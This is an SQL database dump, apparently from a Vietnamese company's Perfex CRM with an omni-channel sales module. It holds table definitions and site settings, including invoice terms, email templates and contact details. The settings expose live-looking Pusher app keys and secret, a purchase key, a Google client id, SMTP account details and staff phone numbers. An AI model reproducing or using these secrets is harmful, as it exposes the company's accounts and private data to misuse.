) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblomni_master_channel_woocommere`
--

CREATE TABLE `tblomni_master_channel_woocommere` (
  `id` int(10) UNSIGNED NOT NULL,
  `name_channel` text NOT NULL,
  `consumer_key` text NOT NULL,
  `consumer_secret` text NOT NULL,
  `url` text NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblomni_pre_order_product_setting`
--

CREATE TABLE `tblomni_pre_order_product_setting` (
  `id` int(10) UNSIGNED NOT NULL,
  `channel_id` int(11) NOT NULL,
  `customer_group` text DEFAULT NULL,
  `customer` text DEFAULT NULL,
  `group_product_id` int(11) DEFAULT NULL,
  `datecreator` datetime NOT NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblomni_refunds`
--

CREATE TABLE `tblomni_refunds` (
  `id` int(10) UNSIGNED NOT NULL,
  `order_id` int(11) DEFAULT NULL,
  `staff_id` int(11) DEFAULT NULL,
  `refunded_on` date DEFAULT NULL,
  `payment_mode` varchar(40) DEFAULT NULL,
  `note` text DEFAULT NULL,
  `amount` decimal(15,2) DEFAULT NULL,
  `created_at` datetime NOT NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblomni_setting_woo_store`
--

CREATE TABLE `tblomni_setting_woo_store` (
  `id` int(10) UNSIGNED NOT NULL,
  `store` int(11) NOT NULL,
  `sync_omni_sales_products` int(11) NOT NULL DEFAULT 0,
  `time1` int(11) NOT NULL DEFAULT 50,
  `sync_omni_sales_inventorys` int(11) NOT NULL DEFAULT 0,
  `time2` int(11) NOT NULL DEFAULT 50,
  `price_crm_woo` int(11) NOT NULL DEFAULT 0,
  `time3` int(11) NOT NULL DEFAULT 50,
  `sync_omni_sales_description` int(11) NOT NULL DEFAULT 0,
  `time4` int(11) NOT NULL DEFAULT 50,
  `sync_omni_sales_images` int(11) NOT NULL DEFAULT 0,
  `time5` int(11) NOT NULL DEFAULT 50,
  `sync_omni_sales_orders` int(11) NOT NULL DEFAULT 0,
  `time6` int(11) NOT NULL DEFAULT 50,
  `product_info_enable_disable` int(11) NOT NULL DEFAULT 0,
  `time7` int(11) NOT NULL DEFAULT 50,
  `product_info_image_enable_disable` int(11) NOT NULL DEFAULT 0,
  `time8` int(11) NOT NULL DEFAULT 50,
  `datecreator` datetime NOT NULL DEFAULT current_timestamp()
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblomni_shift`
--

CREATE TABLE `tblomni_shift` (
  `id` int(10) UNSIGNED NOT NULL,
  `staff_id` int(11) NOT NULL,
  `shift_code` varchar(150) DEFAULT NULL,
  `granted_amount` decimal(15,2) NOT NULL DEFAULT 0.00,
  `incurred_amount` decimal(15,2) NOT NULL DEFAULT 0.00,
  `closing_amount` decimal(15,2) NOT NULL DEFAULT 0.00,
  `status` int(11) NOT NULL DEFAULT 1,
  `created_at` datetime NOT NULL DEFAULT current_timestamp(),
  `order_value` decimal(15,2) NOT NULL DEFAULT 0.00
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblomni_shift_history`
--

CREATE TABLE `tblomni_shift_history` (
  `id` int(10) UNSIGNED NOT NULL,
  `shift_id` int(11) NOT NULL,
  `action` varchar(150) DEFAULT NULL,
  `granted_amount` decimal(15,2) NOT NULL DEFAULT 0.00,
  `current_amount` decimal(15,2) NOT NULL DEFAULT 0.00,
  `customer_amount` decimal(15,2) NOT NULL DEFAULT 0.00,
  `balance_amount` decimal(15,2) NOT NULL DEFAULT 0.00,
  `created_at` datetime NOT NULL DEFAULT current_timestamp(),
  `staff_id` int(11) DEFAULT NULL,
  `customer_id` int(11) DEFAULT NULL,
  `type` varchar(50) DEFAULT NULL,
  `order_value` decimal(15,2) NOT NULL DEFAULT 0.00
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblomni_trade_discount`
--

CREATE TABLE `tblomni_trade_discount` (
  `id` int(10) UNSIGNED NOT NULL,
  `name_trade_discount` varchar(250) NOT NULL,
  `start_time` date NOT NULL,
  `end_time` date NOT NULL,
  `group_clients` text NOT NULL,
  `clients` text NOT NULL,
  `group_items` text NOT NULL,
  `items` text NOT NULL,
  `formal` int(11) NOT NULL,
  `discount` int(11) NOT NULL,
  `voucher` text DEFAULT NULL,
  `channel` int(11) NOT NULL DEFAULT 0,
  `store` varchar(11) NOT NULL DEFAULT '',
  `minimum_order_value` decimal(15,2) DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tbloptions`
--

CREATE TABLE `tbloptions` (
  `id` int(11) NOT NULL,
  `name` varchar(191) NOT NULL,
  `value` longtext NOT NULL,
  `autoload` tinyint(1) NOT NULL DEFAULT 1
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tbloptions`
--

INSERT INTO `tbloptions` (`id`, `name`, `value`, `autoload`) VALUES
(1, 'dateformat', 'd-m-Y|%d-%m-%Y', 1),
(2, 'companyname', 'https://wit.edu.vn/ve-wit/', 1),
(3, 'services', '0', 1),
(4, 'maximum_allowed_ticket_attachments', '8', 1),
(5, 'ticket_attachments_file_extensions', '.svg,.jpg,.png,.pdf,.doc,.zip,.rar', 1),
(6, 'staff_access_only_assigned_departments', '0', 1),
(7, 'use_knowledge_base', '1', 1),
(8, 'smtp_email', 'postmaster@mg.ceilingfan.vn', 1),
(9, 'smtp_password', '061c2c1ecc4466b826ea1be757695c32f0f2e3140c1851eb3ceeaf384f03ff9f4859b8a1cae3ee7ab6d0c71bf888d82be5c66a2f7e4e96a1fc18b5bb23ee6587yRjD3o7lZxJo1/L2wk4KONRe8ki4WaR02IDQ17KEcShecAadL0K/nAa+nFl+igBKf29LTTSFn1lwZ/EDRE7qrkXCfmgOzI09EgzvD8YC2WE=', 1),
(10, 'company_info_format', '{company_name}<br />\r\n{address}{city}<br />\r\nWebsite: https://wit.edu.vn/<br />\r\n{phone}', 0),
(11, 'smtp_port', '587', 1),
(12, 'smtp_host', 'smtp.mailgun.org', 1),
(13, 'smtp_email_charset', 'utf-8', 1),
(14, 'default_timezone', 'Asia/Ho_Chi_Minh', 1),
(15, 'clients_default_theme', 'perfex', 1),
(16, 'company_logo', 'cd224518873be16d233c9364e1dab2d8.png', 1),
(17, 'tables_pagination_limit', '25', 1),
(18, 'main_domain', 'https://wit.edu.vn', 1),
(19, 'allow_registration', '0', 1),
(20, 'knowledge_base_without_registration', '0', 1),
(21, 'email_signature', 'CÔNG TY CỔ PHẦN TỔ CHỨC ĐÀO TẠO WIT<br />\r\n---------------oOo---------------<br />\r\nEmail: tochucdaotaowit@gmail.com<br />\r\nTư vấn Bán Hàng: 0909899367<br />\r\nHotline: 0964389169', 1),
(22, 'default_staff_role', '', 1),
(23, 'newsfeed_maximum_files_upload', '10', 1),
(24, 'contract_expiration_before', '4', 1),
(25, 'invoice_prefix', 'INV-', 1),
(26, 'decimal_separator', '.', 1),
(27, 'thousand_separator', ',', 1),
(28, 'invoice_company_name', 'CÔNG TY CỔ PHẦN TỔ CHỨC ĐÀO TẠO WIT', 1),
(29, 'invoice_company_address', '94 Lương Trúc Đàm, Phú Thạnh, Tân Phú, Thành phố Hồ Chí Minh', 1),
(30, 'invoice_company_city', 'Tp.HCM', 1),
(31, 'invoice_company_country_code', 'Email: tochucdaotaowit@gmail.com', 1),
(32, 'invoice_company_postal_code', '', 1),
(33, 'invoice_company_phonenumber', 'Hotline: 0964389169', 1),
(34, 'view_invoice_only_logged_in', '1', 1),
(35, 'invoice_number_format', '3', 1),
(36, 'next_invoice_number', '392', 0),
(37, 'active_language', 'vietnamese', 1),
(38, 'invoice_number_decrement_on_delete', '1', 1),
(39, 'automatically_send_invoice_overdue_reminder_after', '1', 1),
(40, 'automatically_resend_invoice_overdue_reminder_after', '3', 1),
(41, 'expenses_auto_operations_hour', '2', 1),
(42, 'delete_only_on_last_invoice', '1', 1),
(43, 'delete_only_on_last_estimate', '1', 1),
(44, 'create_invoice_from_recurring_only_on_paid_invoices', '1', 1),
(45, 'allow_payment_amount_to_be_modified', '0', 1),
(46, 'rtl_support_client', '0', 1),
(47, 'limit_top_search_bar_results_to', '10', 1),
(48, 'estimate_prefix', 'QUOTE-', 1),
(49, 'next_estimate_number', '254', 0),
(50, 'estimate_number_decrement_on_delete', '1', 1),
(51, 'estimate_number_format', '3', 1),
(52, 'estimate_auto_convert_to_invoice_on_client_accept', '1', 1),
(53, 'exclude_estimate_from_client_area_with_draft_status', '1', 1),
(54, 'rtl_support_admin', '0', 1),
(55, 'last_cron_run', '1710262801', 1),
(56, 'show_sale_agent_on_estimates', '1', 1),
(57, 'show_sale_agent_on_invoices', '1', 1),
(58, 'predefined_terms_invoice', 'Hóa đơn VAT sẽ xuất theo ngày và báo trước khi xuất hàng đi giao.\r\nGiá bán lẻ không bao gồm thuê GTGT 10% (Theo quy định tại Nghị định 15/2022/NĐ-CP thì nhóm sản phẩm thiết bị điện tử gia dụng có mức thuế suất giá trị gia tăng 10%)', 1),
(59, 'predefined_terms_estimate', 'ĐIỀU KHOẢN MUA HÀNG\r\n- Thanh toán 100% ngay sau khi giao hàng\r\n- Giá trên chưa bao gồm thuế GTGT\r\n- Giá đã bao gồm hỗ trợ hướng dẫn lắp đặt tại công trình.\r\n- Thời gian giao hàng: 2-3 ngày với hàng có sẳn tại kho. Đặt hàng 8-10 tuần sản xuất tại nhà máy\r\n- Hàng mới 100% có chứng nhận xuất xứ C/O, chất lượng C/Q từ nhà máy \r\n\r\nTHỜI GIAN BẢO HÀNH: 05 năm cho động cơ, 1 năm dành cho phụ kiện (bộ điều khiển, cánh, bề mặt hoàn thiện...)\r\n\r\nBáo giá có thời hạn 20 ngày.\r\n\r\nChúng tôi rất mong sự phúc đáp của Quý Công Ty trong thời gian sớm nhất.', 1),
(60, 'default_task_priority', '2', 1),
(61, 'dropbox_app_key', '', 1),
(62, 'show_expense_reminders_on_calendar', '1', 1),
(63, 'only_show_contact_tickets', '1', 1),
(64, 'predefined_clientnote_invoice', 'A. CHÍNH SÁCH BẢO HÀNH - BẢO DƯỠNG\r\n- Thời gian bảo hành MOTOR: 05 năm cho Động Cơ ; phụ kiện (đèn LED, điều khiển...) các bề mặt hoàn thiện 01 năm.\r\n- Các bảo hành khác như thay PIN điều khiển, đổi trả miễn phí trong 12 tháng (hàng nguyên kiện)\r\n- BẢO HÀNH RUNG LẮC, TIẾNG ĐỘNG sau khi nghiệm thu trong 01 tháng sau khi lắp đặt tính phí đi lại 350k/lần đã bao gồm chi phí vệ sinh, kiểm tra an toàn bảo dưỡng quạt (áp dụng Tp.HCM)\r\nB. QUẠT DÂN DỤNG - QUẠT TRẦN TRANG TRÍ:\r\n- Chi phí gia cố lắp đặt trần thạch cao 500k/quạt. Trần bê tông trực tiếp 350k/quạt (chưa nguồn điện, độ cao trần thấp ~ 4m)\r\nC. ĐỐI VỚI QUẠT CÔNG NGHIỆP:\r\n- Chi phí lắp đặt quạt trần công nghiệp cánh lớn 2.5 triệu/quạt (chưa bao gồm nguồn điện, thuê xe nâng).\r\n- Sau lắp đặt nghiệm thu chi phí kiểm tra phát sinh thêm 500k/lần, chưa bao gồm tháo/ráp, vận chuyển đi lại >30km', 1),
(65, 'predefined_clientnote_estimate', 'A. CHÍNH SÁCH BẢO HÀNH - BẢO DƯỠNG\r\n- Thời gian bảo hành MOTOR: 05 năm cho Động Cơ ; phụ kiện (đèn LED, điều khiển...) các bề mặt hoàn thiện 01 năm.\r\n- Các bảo hành khác như thay PIN điều khiển, đổi trả miễn phí trong 12 tháng (hàng nguyên kiện)\r\n- BẢO HÀNH RUNG LẮC, TIẾNG ĐỘNG sau khi nghiệm thu trong 01 tháng sau khi lắp đặt tính phí đi lại 350k/lần đã bao gồm chi phí vệ sinh, kiểm tra an toàn bảo dưỡng quạt (áp dụng Tp.HCM)\r\nB. QUẠT DÂN DỤNG - QUẠT TRẦN TRANG TRÍ:\r\n- Chi phí gia cố lắp đặt trần thạch cao 500k/quạt. Trần bê tông trực tiếp 350k/quạt (chưa nguồn điện, độ cao trần thấp ~ 4m)\r\nC. ĐỐI VỚI QUẠT CÔNG NGHIỆP:\r\n- Chi phí lắp đặt quạt trần công nghiệp cánh lớn 2.5 triệu/quạt (chưa bao gồm nguồn điện, thuê xe nâng).\r\n- Sau lắp đặt nghiệm thu chi phí kiểm tra phát sinh thêm 500k/lần, chưa bao gồm tháo/ráp, vận chuyển đi lại >30km', 1),
(66, 'custom_pdf_logo_image_url', 'logo-wit.png', 1),
(67, 'favicon', 'favicon.png', 1),
(68, 'invoice_due_after', '30', 1),
(69, 'google_api_key', '', 1),
(70, 'google_calendar_main_calendar', '918186905588-kab59uamhctqrdjtqn7r2nvas81revin.apps.googleusercontent.com', 1),
(71, 'default_tax', 'a:0:{}', 1),
(72, 'show_invoices_on_calendar', '1', 1),
(73, 'show_estimates_on_calendar', '1', 1),
(74, 'show_contracts_on_calendar', '1', 1),
(75, 'show_tasks_on_calendar', '1', 1),
(76, 'show_customer_reminders_on_calendar', '1', 1),
(77, 'output_client_pdfs_from_admin_area_in_client_language', '1', 1),
(78, 'show_lead_reminders_on_calendar', '1', 1),
(79, 'send_estimate_expiry_reminder_before', '4', 1),
(80, 'leads_default_source', '4', 1),
(81, 'leads_default_status', '3', 1),
(82, 'proposal_expiry_reminder_enabled', '1', 1),
(83, 'send_proposal_expiry_reminder_before', '4', 1),
(84, 'default_contact_permissions', 'a:6:{i:0;s:1:\"1\";i:1;s:1:\"2\";i:2;s:1:\"3\";i:3;s:1:\"4\";i:4;s:1:\"5\";i:5;s:1:\"6\";}', 1),
(85, 'pdf_logo_width', '230', 1),
(86, 'access_tickets_to_none_staff_members', '0', 1),
(87, 'customer_default_country', '243', 1),
(88, 'view_estimate_only_logged_in', '1', 1),
(89, 'show_status_on_pdf_ei', '1', 1),
(90, 'email_piping_only_replies', '1', 1),
(91, 'email_piping_only_registered', '1', 1),
(92, 'default_view_calendar', 'dayGridMonth', 1),
(93, 'email_piping_default_priority', '3', 1),
(94, 'total_to_words_lowercase', '1', 1),
(95, 'show_tax_per_item', '1', 1),
(96, 'total_to_words_enabled', '1', 1),
(97, 'receive_notification_on_new_ticket', '0', 0),
(98, 'autoclose_tickets_after', '24', 1),
(99, 'media_max_file_size_upload', '10', 1),
(100, 'client_staff_add_edit_delete_task_comments_first_hour', '1', 1),
(101, 'show_projects_on_calendar', '1', 1),
(102, 'leads_kanban_limit', '1000', 1),
(103, 'tasks_reminder_notification_before', '2', 1),
(104, 'pdf_font', 'freesans', 1),
(105, 'pdf_table_heading_color', '#0d71a8', 1),
(106, 'pdf_table_heading_text_color', '#ffffff', 1),
(107, 'pdf_font_size', '10', 1),
(108, 'default_leads_kanban_sort', 'dateadded', 1),
(109, 'default_leads_kanban_sort_type', 'asc', 1),
(110, 'allowed_files', '.svg,.png,.jpg,.pdf,.doc,.docx,.xls,.xlsx,.zip,.rar,.txt', 1),
(111, 'show_all_tasks_for_project_member', '1', 1),
(112, 'email_protocol', 'smtp', 1),
(113, 'calendar_first_day', '0', 1),
(114, 'recaptcha_secret_key', '', 1),
(115, 'show_help_on_setup_menu', '1', 1),
(116, 'show_proposals_on_calendar', '1', 1),
(117, 'smtp_encryption', 'tls', 1),
(118, 'recaptcha_site_key', '', 1),
(119, 'smtp_username', 'postmaster@mg.ceilingfan.vn', 1),
(120, 'auto_stop_tasks_timers_on_new_timer', '1', 1),
(121, 'notification_when_customer_pay_invoice', '1', 1),
(122, 'calendar_invoice_color', '#ff6f00', 1),
(123, 'calendar_estimate_color', '#ff6f00', 1),
(124, 'calendar_proposal_color', '#84c529', 1),
(125, 'new_task_auto_assign_current_member', '1', 1),
(126, 'calendar_reminder_color', '#03a9f4', 1),
(127, 'calendar_contract_color', '#b72974', 1),
(128, 'calendar_project_color', '#b72974', 1),
(129, 'update_info_message', '', 1),
(130, 'show_estimate_reminders_on_calendar', '1', 1),
(131, 'show_invoice_reminders_on_calendar', '1', 1),
(132, 'show_proposal_reminders_on_calendar', '1', 1),
(133, 'proposal_due_after', '7', 1),
(134, 'allow_customer_to_change_ticket_status', '1', 1),
(135, 'lead_lock_after_convert_to_customer', '1', 1),
(136, 'default_proposals_pipeline_sort', 'datecreated', 1),
(137, 'default_proposals_pipeline_sort_type', 'desc', 1),
(138, 'default_estimates_pipeline_sort', 'pipeline_order', 1),
(139, 'default_estimates_pipeline_sort_type', 'desc', 1),
(140, 'use_recaptcha_customers_area', '0', 1),
(141, 'remove_decimals_on_zero', '1', 1),
(142, 'remove_tax_name_from_item_table', '1', 1),
(143, 'pdf_format_invoice', 'LETTER-PORTRAIT', 1),
(144, 'pdf_format_estimate', 'LETTER-PORTRAIT', 1),
(145, 'pdf_format_proposal', 'LETTER-PORTRAIT', 1),
(146, 'pdf_format_payment', 'LETTER-PORTRAIT', 1),
(147, 'pdf_format_contract', 'LETTER-PORTRAIT', 1),
(148, 'swap_pdf_info', '0', 1),
(149, 'exclude_invoice_from_client_area_with_draft_status', '1', 1),
(150, 'cron_has_run_from_cli', '1', 1),
(151, 'hide_cron_is_required_message', '1', 0),
(152, 'auto_assign_customer_admin_after_lead_convert', '1', 1),
(153, 'show_transactions_on_invoice_pdf', '1', 1),
(154, 'show_pay_link_to_invoice_pdf', '1', 1),
(155, 'tasks_kanban_limit', '100', 1),
(156, 'purchase_key', '1430cb76-fdc9-4b8a-a064-05ea6a9f3d62', 1),
(157, 'estimates_pipeline_limit', '50', 1),
(158, 'proposals_pipeline_limit', '50', 1),
(159, 'proposal_number_prefix', 'PRO-', 1),
(160, 'number_padding_prefixes', '0', 1),
(161, 'show_page_number_on_pdf', '1', 1),
(162, 'calendar_events_limit', '4', 1),
(163, 'show_setup_menu_item_only_on_hover', '1', 1),
(164, 'company_requires_vat_number_field', '0', 1),
(165, 'company_is_required', '0', 1),
(166, 'allow_contact_to_delete_files', '1', 1),
(167, 'company_vat', '', 1),
(168, 'di', '1640619460', 1),
(169, 'invoice_auto_operations_hour', '1', 1),
(170, 'use_minified_files', '1', 1),
(171, 'only_own_files_contacts', '1', 1),
(172, 'allow_primary_contact_to_view_edit_billing_and_shipping', '1', 1),
(173, 'estimate_due_after', '7', 1),
(174, 'staff_members_open_tickets_to_all_contacts', '0', 1),
(175, 'time_format', '24', 1),
(176, 'delete_activity_log_older_then', '1', 1),
(177, 'disable_language', '0', 1),
(178, 'company_state', '', 1),
(179, 'email_header', '<!doctype html>\r\n                            <html>\r\n                            <head>\r\n                              <meta name=\"viewport\" content=\"width=device-width\" />\r\n                              <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />\r\n                              <style>\r\n                                body {\r\n                                 background-color: #f6f6f6;\r\n                                 font-family: sans-serif;\r\n                                 -webkit-font-smoothing: antialiased;\r\n                                 font-size: 14px;\r\n                                 line-height: 1.4;\r\n                                 margin: 0;\r\n                                 padding: 0;\r\n                                 -ms-text-size-adjust: 100%;\r\n                                 -webkit-text-size-adjust: 100%;\r\n                               }\r\n                               table {\r\n                                 border-collapse: separate;\r\n                                 mso-table-lspace: 0pt;\r\n                                 mso-table-rspace: 0pt;\r\n                                 width: 100%;\r\n                               }\r\n                               table td {\r\n                                 font-family: sans-serif;\r\n                                 font-size: 14px;\r\n                                 vertical-align: top;\r\n                               }\r\n                                   /* -------------------------------------\r\n                                     BODY & CONTAINER\r\n                                     ------------------------------------- */\r\n                                     .body {\r\n                                       background-color: #f6f6f6;\r\n                                       width: 100%;\r\n                                     }\r\n                                     /* Set a max-width, and make it display as block so it will automatically stretch to that width, but will also shrink down on a phone or something */\r\n\r\n                                     .container {\r\n                                       display: block;\r\n                                       margin: 0 auto !important;\r\n                                       /* makes it centered */\r\n                                       max-width: 680px;\r\n                                       padding: 10px;\r\n                                       width: 680px;\r\n                                     }\r\n                                     /* This should also be a block element, so that it will fill 100% of the .container */\r\n\r\n                                     .content {\r\n                                       box-sizing: border-box;\r\n                                       display: block;\r\n                                       margin: 0 auto;\r\n                                       max-width: 680px;\r\n                                       padding: 10px;\r\n                                     }\r\n                                   /* -------------------------------------\r\n                                     HEADER, FOOTER, MAIN\r\n                                     ------------------------------------- */\r\n\r\n                                     .main {\r\n                                       background: #fff;\r\n                                       border-radius: 3px;\r\n                                       width: 100%;\r\n                                     }\r\n                                     .wrapper {\r\n                                       box-sizing: border-box;\r\n                                       padding: 20px;\r\n                                     }\r\n                                     .footer {\r\n                                       clear: both;\r\n                                       padding-top: 10px;\r\n                                       text-align: center;\r\n                                       width: 100%;\r\n                                     }\r\n                                     .footer td,\r\n                                     .footer p,\r\n                                     .footer span,\r\n                                     .footer a {\r\n                                       color: #999999;\r\n                                       font-size: 12px;\r\n                                       text-align: center;\r\n                                     }\r\n                                     hr {\r\n                                       border: 0;\r\n                                       border-bottom: 1px solid #f6f6f6;\r\n                                       margin: 20px 0;\r\n                                     }\r\n                                   /* -------------------------------------\r\n                                     RESPONSIVE AND MOBILE FRIENDLY STYLES\r\n                                     ------------------------------------- */\r\n\r\n                                     @media only screen and (max-width: 620px) {\r\n                                       table[class=body] .content {\r\n                                         padding: 0 !important;\r\n                                       }\r\n                                       table[class=body] .container {\r\n                                         padding: 0 !important;\r\n                                         width: 100% !important;\r\n                                       }\r\n                                       table[class=body] .main {\r\n                                         border-left-width: 0 !important;\r\n                                         border-radius: 0 !important;\r\n                                         border-right-width: 0 !important;\r\n                                       }\r\n                                     }\r\n                                   </style>\r\n                                 </head>\r\n                                 <body class=\"\">\r\n                                  <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" class=\"body\">\r\n                                    <tr>\r\n                                     <td>&nbsp;</td>\r\n                                     <td class=\"container\">\r\n                                      <div class=\"content\">\r\n                                        <!-- START CENTERED WHITE CONTAINER -->\r\n                                        <table class=\"main\">\r\n                                          <!-- START MAIN CONTENT AREA -->\r\n                                          <tr>\r\n                                           <td class=\"wrapper\">\r\n                                            <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\">\r\n                                              <tr>\r\n                                               <td>', 1),
(180, 'show_pdf_signature_invoice', '0', 0),
(181, 'show_pdf_signature_estimate', '0', 0),
(182, 'signature_image', 'signature.jpg', 0),
(183, 'email_footer', '</td>\r\n                             </tr>\r\n                           </table>\r\n                         </td>\r\n                       </tr>\r\n                       <!-- END MAIN CONTENT AREA -->\r\n                     </table>\r\n                     <!-- START FOOTER -->\r\n                     <div class=\"footer\">\r\n                      <table border=\"0\" cellpadding=\"0\" cellspacing=\"0\">\r\n                        <tr>\r\n                          <td class=\"content-block\">\r\n                            <span>{companyname}</span>\r\n                          </td>\r\n                        </tr>\r\n                      </table>\r\n                    </div>\r\n                    <!-- END FOOTER -->\r\n                    <!-- END CENTERED WHITE CONTAINER -->\r\n                  </div>\r\n                </td>\r\n                <td>&nbsp;</td>\r\n              </tr>\r\n            </table>\r\n            </body>\r\n            </html>', 1),
(184, 'exclude_proposal_from_client_area_with_draft_status', '1', 1),
(185, 'pusher_app_key', '450d3a00501259ea75ab', 1),
(186, 'pusher_app_secret', 'ed7b15a090a4450622bf', 1),
(187, 'pusher_app_id', '1358656', 1),
(188, 'pusher_realtime_notifications', '1', 1),
(189, 'pdf_format_statement', 'LETTER-PORTRAIT', 1),
(190, 'pusher_cluster', 'ap1', 1),
(191, 'show_table_export_button', 'only_admins', 1),
(192, 'allow_staff_view_proposals_assigned', '0', 1),
(193, 'show_cloudflare_notice', '1', 0),
(194, 'task_modal_class', 'modal-lg', 1),
(195, 'lead_modal_class', 'modal-lg', 1),
(196, 'show_timesheets_overview_all_members_notice_admins', '1', 0),
(197, 'desktop_notifications', '1', 1),
(198, 'hide_notified_reminders_from_calendar', '1', 0),
(199, 'customer_info_format', '{company_name}<br />\r\n{phone}<br />\r\n{street}, {city}<br />\r\n{customer_id}', 0),
(200, 'timer_started_change_status_in_progress', '1', 0),
(201, 'default_ticket_reply_status', '1', 1),
(202, 'default_task_status', 'auto', 1),
(203, 'email_queue_skip_with_attachments', '1', 1),
(204, 'email_queue_enabled', '1', 1),
(205, 'last_email_queue_retry', '1710262801', 1),
(206, 'auto_dismiss_desktop_notifications_after', '0', 1),
(207, 'proposal_info_format', '{proposal_to}<br />\r\n{address}<br />\r\n{city} {state}<br />\r\n{country_code} {zip_code}<br />\r\n{phone}<br />\r\n{email}<br />\r\nLưu ý: Bảng đề xuất báo giá có thể thoả thuận chi phí phát sinh như lắp đặt, vận chuyển, đi lại theo từng trường hợp. Liên hệ Hotline: 0909899 367 hoặc 0913123 860<br />\r\n- Thời gian bảo hành: xem báo giá; phụ kiện (đèn LED, điều khiển...) các bề mặt hoàn thiện bảo hành 01 năm.<br />\r\n- Các bảo hành khác như thay PIN điều khiển, đổi trả miễn phí trong 12-24 tháng (hàng nguyên kiện)<br />\r\n- BẢO HÀNH RUNG LẮC, TIẾNG ĐỘNG sau khi nghiệm thu trong 01 tháng sau khi lắp đặt tính phí đi lại 350k/lần (đã bao gồm chi phí vệ sinh, kiểm tra an toàn bảo dưỡng quạt)', 0),
(208, 'ticket_replies_order', 'asc', 1),
(209, 'new_recurring_invoice_action', 'generate_and_send', 0),
(210, 'bcc_emails', 'cskh@hogiaphat.vn', 0);
INSERT INTO `tbloptions` (`id`, `name`, `value`, `autoload`) VALUES
(211, 'email_templates_language_checks', 'a:2850:{s:26:\"new-client-created-swedish\";i:1;s:30:\"invoice-send-to-client-swedish\";i:1;s:31:\"new-ticket-opened-admin-swedish\";i:1;s:20:\"ticket-reply-swedish\";i:1;s:27:\"ticket-autoresponse-swedish\";i:1;s:32:\"invoice-payment-recorded-swedish\";i:1;s:30:\"invoice-overdue-notice-swedish\";i:1;s:28:\"invoice-already-send-swedish\";i:1;s:32:\"new-ticket-created-staff-swedish\";i:1;s:31:\"estimate-send-to-client-swedish\";i:1;s:29:\"ticket-reply-to-admin-swedish\";i:1;s:29:\"estimate-already-send-swedish\";i:1;s:27:\"contract-expiration-swedish\";i:1;s:21:\"task-assigned-swedish\";i:1;s:30:\"task-added-as-follower-swedish\";i:1;s:22:\"task-commented-swedish\";i:1;s:29:\"task-added-attachment-swedish\";i:1;s:34:\"estimate-declined-to-staff-swedish\";i:1;s:34:\"estimate-accepted-to-staff-swedish\";i:1;s:32:\"proposal-client-accepted-swedish\";i:1;s:33:\"proposal-send-to-customer-swedish\";i:1;s:32:\"proposal-client-declined-swedish\";i:1;s:33:\"proposal-client-thank-you-swedish\";i:1;s:34:\"proposal-comment-to-client-swedish\";i:1;s:33:\"proposal-comment-to-admin-swedish\";i:1;s:38:\"estimate-thank-you-to-customer-swedish\";i:1;s:34:\"task-deadline-notification-swedish\";i:1;s:21:\"send-contract-swedish\";i:1;s:41:\"invoice-payment-recorded-to-staff-swedish\";i:1;s:25:\"auto-close-ticket-swedish\";i:1;s:47:\"new-project-discussion-created-to-staff-swedish\";i:1;s:50:\"new-project-discussion-created-to-customer-swedish\";i:1;s:45:\"new-project-file-uploaded-to-customer-swedish\";i:1;s:42:\"new-project-file-uploaded-to-staff-swedish\";i:1;s:50:\"new-project-discussion-comment-to-customer-swedish\";i:1;s:47:\"new-project-discussion-comment-to-staff-swedish\";i:1;s:37:\"staff-added-as-project-member-swedish\";i:1;s:32:\"estimate-expiry-reminder-swedish\";i:1;s:32:\"proposal-expiry-reminder-swedish\";i:1;s:25:\"new-staff-created-swedish\";i:1;s:31:\"contact-forgot-password-swedish\";i:1;s:32:\"contact-password-reseted-swedish\";i:1;s:28:\"contact-set-password-swedish\";i:1;s:29:\"staff-forgot-password-swedish\";i:1;s:30:\"staff-password-reseted-swedish\";i:1;s:27:\"assigned-to-project-swedish\";i:1;s:41:\"task-added-attachment-to-contacts-swedish\";i:1;s:34:\"task-commented-to-contacts-swedish\";i:1;s:25:\"new-lead-assigned-swedish\";i:1;s:24:\"client-statement-swedish\";i:1;s:32:\"ticket-assigned-to-admin-swedish\";i:1;s:38:\"new-client-registered-to-admin-swedish\";i:1;s:38:\"new-web-to-lead-form-submitted-swedish\";i:1;s:33:\"two-factor-authentication-swedish\";i:1;s:36:\"project-finished-to-customer-swedish\";i:1;s:34:\"credit-note-send-to-client-swedish\";i:1;s:35:\"task-status-change-to-staff-swedish\";i:1;s:38:\"task-status-change-to-contacts-swedish\";i:1;s:28:\"reminder-email-staff-swedish\";i:1;s:34:\"contract-comment-to-client-swedish\";i:1;s:33:\"contract-comment-to-admin-swedish\";i:1;s:25:\"send-subscription-swedish\";i:1;s:35:\"subscription-payment-failed-swedish\";i:1;s:29:\"subscription-canceled-swedish\";i:1;s:38:\"subscription-payment-succeeded-swedish\";i:1;s:36:\"contract-expiration-to-staff-swedish\";i:1;s:28:\"gdpr-removal-request-swedish\";i:1;s:33:\"gdpr-removal-request-lead-swedish\";i:1;s:37:\"client-registration-confirmed-swedish\";i:1;s:32:\"contract-signed-to-staff-swedish\";i:1;s:36:\"customer-subscribed-to-staff-swedish\";i:1;s:34:\"contact-verification-email-swedish\";i:1;s:51:\"new-customer-profile-file-uploaded-to-staff-swedish\";i:1;s:35:\"event-notification-to-staff-swedish\";i:1;s:44:\"subscription-payment-requires-action-swed